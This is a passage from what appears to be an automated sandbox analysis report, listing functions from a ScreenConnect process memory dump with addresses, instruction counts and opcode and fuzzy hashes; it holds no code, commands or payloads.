                                                                                                              • Instruction ID: 94493a03521bf9401fa7ffc1f33719ccd8973eb54ef9067e5e336dbeed1679bc
                                                                                                              • Opcode Fuzzy Hash: adb95e7e9c0fafed58c502f62bbe96acc49bcd32bf6680d3e2c170225281c614
                                                                                                              • Instruction Fuzzy Hash: FB410BB1B09A868FEB95DB2888E86A537D1FF99344F5800B9D04CC32D3DF28B841CB41
                                                                                                              Function 00007FFD3472BB95 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ;-
                                                                                                              • API String ID: 0-2640062417
                                                                                                              • Opcode ID: 38f5380b33f2adad8dfa99926aef88d3d63cae1f26c686f4f316e2eb656560f0
                                                                                                              • Instruction ID: 57d5a8892cdf1754fab7fe30ad9ccdc8c050649e190960d8881a3c18dfe2c07d
                                                                                                              • Opcode Fuzzy Hash: 38f5380b33f2adad8dfa99926aef88d3d63cae1f26c686f4f316e2eb656560f0
                                                                                                              • Instruction Fuzzy Hash: 9D312771B18D0A8FE795EF2C94A8279B3D1FF99350B5406BAC40DC3296DD29FC828381
                                                                                                              Function 00007FFD3472C32A Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0,|4
                                                                                                              • API String ID: 0-1107712630
                                                                                                              • Opcode ID: ec80bd3cf1f40ec3c03c7f827decbdffbae3271182672d67540283783b68d13a
                                                                                                              • Instruction ID: bb877f8e849ac52f438b90b1e81d92f284637d6c5557656d644a7ba976f4827f
                                                                                                              • Opcode Fuzzy Hash: ec80bd3cf1f40ec3c03c7f827decbdffbae3271182672d67540283783b68d13a
                                                                                                              • Instruction Fuzzy Hash: E1216E61B0D9894FE7A4EB3C98A927577D1FFAA24070405BBC14DC71A7DD1DB8069381
                                                                                                              Function 00007FFD34725F6D Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 14
                                                                                                              • API String ID: 0-3295568162
                                                                                                              • Opcode ID: a86ddcc506779d032742e21c6c3b05beca9907b32e755e04da755e56676d1adf
                                                                                                              • Instruction ID: 5ca4e6d77034b35a7a48498d489618553540ca395a0d7bafacdbcf8981bba1a6
                                                                                                              • Opcode Fuzzy Hash: a86ddcc506779d032742e21c6c3b05beca9907b32e755e04da755e56676d1adf
                                                                                                              • Instruction Fuzzy Hash: F01187B2E0DA498BDFD5DF5448E51E87FA0FF56384F0500DAE199D31D2DA24B801D742
                                                                                                              Function 00007FFD347225C0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: x14
                                                                                                              • API String ID: 0-1627273019
                                                                                                              • Opcode ID: 71b257143a107d2d275bb7081ad45d6dcad28fbdf7eeb8fe6a45403ce23726d9
                                                                                                              • Instruction ID: 7b79d54939c4fb16f1c64ac7f900f3d23c4f9c078e5e76387c80570652479aac
                                                                                                              • Opcode Fuzzy Hash: 71b257143a107d2d275bb7081ad45d6dcad28fbdf7eeb8fe6a45403ce23726d9
                                                                                                              • Instruction Fuzzy Hash: 881172B1B09A4A8FDB99DE19C4A4A6533D1FFA8704B0401BED45DD7382CE25FC42CB80
                                                                                                              Function 00007FFD3472DAEC Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Pf|4
                                                                                                              • API String ID: 0-70100323
                                                                                                              • Opcode ID: becd7a589c41f1ca4140be95209a353a733b53e1e0af506416b9e759eac89a16
                                                                                                              • Instruction ID: 670a3c75e67812b641780ef9469c5f2a33e74f14f63f57c093799e183e9c2846
                                                                                                              • Opcode Fuzzy Hash: becd7a589c41f1ca4140be95209a353a733b53e1e0af506416b9e759eac89a16
                                                                                                              • Instruction Fuzzy Hash: ED010071E1491E8FDBE4EA1894A97F8B3A1EB59355F1001FAC11DE2291DE396DC18B40
                                                                                                              Function 00007FFD347201FA Relevance: .4, Instructions: 422COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66bb699585217cffb90c80349e77813c4611f2eca622e2ca15433758fd55f40e
                                                                                                              • Instruction ID: d0abc17eb3af9f401eb588f9eb1f12e02179d2ecb00be0fa141602150504f26d
                                                                                                              • Opcode Fuzzy Hash: 66bb699585217cffb90c80349e77813c4611f2eca622e2ca15433758fd55f40e
                                                                                                              • Instruction Fuzzy Hash: FEE12C75709A498FDADCEE1CC0A0AA173E1FF65358B6409B9D15DCB297CA29F842CB40
                                                                                                              Function 00007FFD347251BD Relevance: .3, Instructions: 330COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34ac64dc54f4673cb901b3dc4e4f5a27f37ae1e1a7cfca0216aab02a8bdc77d7
                                                                                                              • Instruction ID: 624c1e87ae966aa24a4236745c177f011f54697d93aa882026085c778fda86bc
                                                                                                              • Opcode Fuzzy Hash: 34ac64dc54f4673cb901b3dc4e4f5a27f37ae1e1a7cfca0216aab02a8bdc77d7
                                                                                                              • Instruction Fuzzy Hash: C2B1AF34608B098FDBDCEF19C4A4A65B3E1FF69344B6509ADD059CF29BCA25F842CB40
                                                                                                              Function 00007FFD34723EF5 Relevance: .3, Instructions: 283COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d817f237ff367a2391f104f2c06f8dcbaec4c57e855d00f05b3aa2581e3770d
                                                                                                              • Instruction ID: a28a0e8aad4a1337ffc57acdd7e6547509160b1189abcf4007a6e0c364929ebc
                                                                                                              • Opcode Fuzzy Hash: 7d817f237ff367a2391f104f2c06f8dcbaec4c57e855d00f05b3aa2581e3770d
                                                                                                              • Instruction Fuzzy Hash: 3D91443470DA498FDBDDEF28C4A46A177E1FF99304B2445A9C059CB68BCA29F847C780
                                                                                                              Function 00007FFD3472CF0A Relevance: .2, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0659b231b9934a65baa4b6a5b6232fb081a98cd4e8842af7a40a1cb2e2838c9a
                                                                                                              • Instruction ID: dc33040be0c10ea94d2b76d894f36a7fbccecd9551cda572162fd59bba8a1223
                                                                                                              • Opcode Fuzzy Hash: 0659b231b9934a65baa4b6a5b6232fb081a98cd4e8842af7a40a1cb2e2838c9a
                                                                                                              • Instruction Fuzzy Hash: C2A15FB0E092458FE758EB2488B17A937A1EF56350F0001BEC64DD72C2DE3D65469BD6
                                                                                                              Function 00007FFD34727907 Relevance: .2, Instructions: 242COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 370e69feb9cb7f685c90a0c69bedc42acd0a9b358b657d6b4b4eae5422913747
                                                                                                              • Instruction ID: dacfc1cf34f83770b2835051b53742597a2a8f5ad7743c3ab70d420c592a1655
                                                                                                              • Opcode Fuzzy Hash: 370e69feb9cb7f685c90a0c69bedc42acd0a9b358b657d6b4b4eae5422913747
                                                                                                              • Instruction Fuzzy Hash: 1E819771B18917CAEBA99B2881F16FD32F2EF96394F514039D54EC32C5DE3CB9429280
                                                                                                              Function 00007FFD34720636 Relevance: .2, Instructions: 237COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9db75cfdc7be5774e53b7f3381746dfaff719517fd2be52b4e9ac301a78484b0
                                                                                                              • Instruction ID: 8c68c6d9042b05b949185f4315a2e3407db1301b206ca3b1aad15aa27c86d799
                                                                                                              • Opcode Fuzzy Hash: 9db75cfdc7be5774e53b7f3381746dfaff719517fd2be52b4e9ac301a78484b0
                                                                                                              • Instruction Fuzzy Hash: 2B7130B0718A4ACFEBA8EB18C4E5BA633D1FF59341F504478E64EC7292DD69F8019790
                                                                                                              Function 00007FFD3472137F Relevance: .2, Instructions: 166COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 705df0ae59d7b2b11906babf80a2a72c1b49cded5d436353ea686f81952cccc1
                                                                                                              • Instruction ID: 8ccbc00a7f21ac3a7fd3367e94d5c7ac79b76a3e0d4fee40163e0e154e452c84
                                                                                                              • Opcode Fuzzy Hash: 705df0ae59d7b2b11906babf80a2a72c1b49cded5d436353ea686f81952cccc1
                                                                                                              • Instruction Fuzzy Hash: FE51F863A0E6955FE766AB7C98B11E63B91EF03368B0801B6D18CCB0A3DD19B84593C1
                                                                                                              Function 00007FFD3472D870 Relevance: .1, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29867dd1656e80dc5e10bc3ea9c2c2dbac68289846fc085c639d0ba1af71abed
                                                                                                              • Instruction ID: e4a0870dc9efe47aa74dc497540d61201958fada5e94e0af0c21476c8efbfd5b
                                                                                                              • Opcode Fuzzy Hash: 29867dd1656e80dc5e10bc3ea9c2c2dbac68289846fc085c639d0ba1af71abed
                                                                                                              • Instruction Fuzzy Hash: 7551F8B0E0850A8FEBA4EB28C4A97A537E1EF59340F5041BAD54CD72D2DD2CBC4597C0
                                                                                                              Function 00007FFD347260E4 Relevance: .1, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ea8e483a3c0dcb74178ab2aaccbdb46bff44ea360d1f121ac7176324b2acae8
                                                                                                              • Instruction ID: 961fccf49f312751e7e1fb70b707abb2fca94f02160c659493fee9f12ce9372c
                                                                                                              • Opcode Fuzzy Hash: 0ea8e483a3c0dcb74178ab2aaccbdb46bff44ea360d1f121ac7176324b2acae8
                                                                                                              • Instruction Fuzzy Hash: 7F4170B5708A898FDB98DF18C8A0AA537A1FF59314B14059ED42EC72D2CB35F852CB41
                                                                                                              Function 00007FFD34724461 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10d82f8e05489b01b9d1b420bf19ae2d9437d4cdbf49d471a09ed7ee09fc67d9
                                                                                                              • Instruction ID: 62e70cfc500dc5936362f9f5d4985ac20e7cfbce4f1a82aea0b8fb9e3779c7e5
                                                                                                              • Opcode Fuzzy Hash: 10d82f8e05489b01b9d1b420bf19ae2d9437d4cdbf49d471a09ed7ee09fc67d9
                                                                                                              • Instruction Fuzzy Hash: 5F31E9A2B09D4A4FEB94EA2D44E56B433D1EBA6384B0501BFD54DD7287DE1DBC069380
                                                                                                              Function 00007FFD3472D93B Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 31e2457f0449c76b645ecb985fde55dc80b25867c746ba78e51a016be33f9cbd
                                                                                                              • Instruction ID: 6efd406caa26cbb9e9107b229366333e3c410292d158d6ff8807e71a5731a1d4
                                                                                                              • Opcode Fuzzy Hash: 31e2457f0449c76b645ecb985fde55dc80b25867c746ba78e51a016be33f9cbd
                                                                                                              • Instruction Fuzzy Hash: 433161B1A049198FEBD4EF18C4A97A537E1FF59300F4440BAD54DD72A2CE38BD819B80
                                                                                                              Function 00007FFD34727F85 Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4600d72b322c067ea87f3fe8ea37d136b1a7304a6dfa169fad3fc64327d46df
                                                                                                              • Instruction ID: f5f505fd30fab33d78443fb6f88ee778eb5c9f3ba51e40e7fc6151bf2e4afac5
                                                                                                              • Opcode Fuzzy Hash: a4600d72b322c067ea87f3fe8ea37d136b1a7304a6dfa169fad3fc64327d46df
                                                                                                              • Instruction Fuzzy Hash: DC21F460B0C5468FE7A5972884B07B972D2AF8B3C0F4641B6D64DC72D2DD5DBC06A3E1
                                                                                                              Function 00007FFD3472D915 Relevance: .1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae32cbd2bf9d233c3d4166007dc3b7dab71fb9df2855b88a39d3d8cbc1e5dbe7
                                                                                                              • Instruction ID: f05823c8f357ddf62d825c279915e04b60ae41eac72a0232fd3ac0540917fe2e
                                                                                                              • Opcode Fuzzy Hash: ae32cbd2bf9d233c3d4166007dc3b7dab71fb9df2855b88a39d3d8cbc1e5dbe7
                                                                                                              • Instruction Fuzzy Hash: 622171B1A099198FDBA4EF28C4A9BA577F1EF69300F4041EAD44DD7262CE34AD818B40
                                                                                                              Function 00007FFD34725D91 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0c6227539ad90f2c5bcbac4fb06338f61991cdcaf6b1bb76ac9244bb598e649
                                                                                                              • Instruction ID: 723fa1f9896732f7e9fa99c21c1c47009291d983eb4b1d5568745acb7e912946
                                                                                                              • Opcode Fuzzy Hash: a0c6227539ad90f2c5bcbac4fb06338f61991cdcaf6b1bb76ac9244bb598e649
                                                                                                              • Instruction Fuzzy Hash: 4A1101B3A0DB454AFB96EA2CA8D34B077D0EB432B074005BEDAD6C6493D90EF44293C1
                                                                                                              Function 00007FFD34725E20 Relevance: .1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c52928a95c4c5553a39018950cf81f277fc14e344a4834f992a12d3c0ca1252
                                                                                                              • Instruction ID: 124dd2b12c93a3727388c11eee11eaac6272a797428b1a479d317d497560f14d
                                                                                                              • Opcode Fuzzy Hash: 1c52928a95c4c5553a39018950cf81f277fc14e344a4834f992a12d3c0ca1252
                                                                                                              • Instruction Fuzzy Hash: 4F117192E1DA864FE7C5A73D14E60B47BC1EF562E075801F9D048CB1D7D81CA846C791
                                                                                                              Function 00007FFD34726C1C Relevance: .1, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 71a396553ecf356b7fa30228563c206a6aab6ee30e07c3e5e4a8d0a80facae8c
                                                                                                              • Instruction ID: 341770bccfb3ce36f4fab2a4e242781b2e0b4c70018649b613690ac508a0dc62
                                                                                                              • Opcode Fuzzy Hash: 71a396553ecf356b7fa30228563c206a6aab6ee30e07c3e5e4a8d0a80facae8c
                                                                                                              • Instruction Fuzzy Hash: 8511E9A1B0D5578AFFB9AB1494F02F436C1DF47380F4401BADA8DDA2D7DD1CB849A290
                                                                                                              Function 00007FFD3472280C Relevance: .1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9857eecc8c713d5752bc944ce8515a33478b0d92d028af573d9839a82230e4f5
                                                                                                              • Instruction ID: 41dcdd83f726675d0bfe971f2df4efec9f609d0f005b926729a1c4b6672d014a
                                                                                                              • Opcode Fuzzy Hash: 9857eecc8c713d5752bc944ce8515a33478b0d92d028af573d9839a82230e4f5
                                                                                                              • Instruction Fuzzy Hash: CA114CA1B089498FEB98EF28C4A0A6577E1FF59344B1441B9D48EDB287CA39F845C781
                                                                                                              Function 00007FFD34722875 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0896a308f8ed567757124dc1eed12ab0e58958bb89b768f80d9bac0ba78de1bb
                                                                                                              • Instruction ID: 11257a9ed9d043b55df1f6556de72f7c1e970aab0def6353cf7daa91ccf471c4
                                                                                                              • Opcode Fuzzy Hash: 0896a308f8ed567757124dc1eed12ab0e58958bb89b768f80d9bac0ba78de1bb
                                                                                                              • Instruction Fuzzy Hash: 18115E71B089498FDB88EF28C4A0A6577E1FF59344B1441B9D48DDB287CA39F845C780
                                                                                                              Function 00007FFD3472CE0D Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4575ebd1dfa3c49d6ed87d593399dcf91f98845e3df06547c90d591049dde830
                                                                                                              • Instruction ID: c91a8c3e61b0aa999322853632fbed05ac50a1cb9f267129544eedd343f9aaf4
                                                                                                              • Opcode Fuzzy Hash: 4575ebd1dfa3c49d6ed87d593399dcf91f98845e3df06547c90d591049dde830
                                                                                                              • Instruction Fuzzy Hash: 50015B75A08A5C8FDB99DF18C8997A9B7F0FB54301F1002AEC00AD3251DB356985DB41
                                                                                                              Function 00007FFD347213FB Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4dcc0f38038561124dae6a3e9c060f1342e60b2a89ab8facfff2a6e63fe84428
                                                                                                              • Instruction ID: 51ea32681f59f5b1c7cd79020575c5bfbcb12866df950a3876df6787c59ccd6f
                                                                                                              • Opcode Fuzzy Hash: 4dcc0f38038561124dae6a3e9c060f1342e60b2a89ab8facfff2a6e63fe84428
                                                                                                              • Instruction Fuzzy Hash: F5F0C87290E658AFD752FB78E4614D67BA0EF06318B0401A7D08DCA063DA2AB949C7C1
                                                                                                              Function 00007FFD3472DCA0 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87a9d23f0b24b11c1f6cc73af043a86cf9cd54cf20af7e67c2f6b6ad6e9cae83
                                                                                                              • Instruction ID: 06c1644991b7e8900ede7962ab316dde909da0ff2a061228ac227d7840247910
                                                                                                              • Opcode Fuzzy Hash: 87a9d23f0b24b11c1f6cc73af043a86cf9cd54cf20af7e67c2f6b6ad6e9cae83
                                                                                                              • Instruction Fuzzy Hash: 51E09BB114D50C6EA61CAA55AC479F7379CE747134F00112FE18EC5002F156B5238295
                                                                                                              Function 00007FFD347211D8 Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c64091a818f58d690d2719a467db6af3acce8f8c6b2942885bef1ba27a2a286
                                                                                                              • Instruction ID: dda5dd16c6fabdd6ffc77650674277f49081022332f4a3f2b2eb6c407f9701a1
                                                                                                              • Opcode Fuzzy Hash: 8c64091a818f58d690d2719a467db6af3acce8f8c6b2942885bef1ba27a2a286
                                                                                                              • Instruction Fuzzy Hash: 55F09351F29C1B47F7E4657E14E55B661C2EFD52E07950175D50CC71C5DC1CF88152D0
                                                                                                              Function 00007FFD34725E6D Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 631d57a2e0cd1206f68161d93e4f6501825f96e911325557d2f1413dbcbe62c3
                                                                                                              • Instruction ID: 67c60dae496411aa58ca8742340895d76cc80b77c1e098c6a59f4345f3270ac4
                                                                                                              • Opcode Fuzzy Hash: 631d57a2e0cd1206f68161d93e4f6501825f96e911325557d2f1413dbcbe62c3
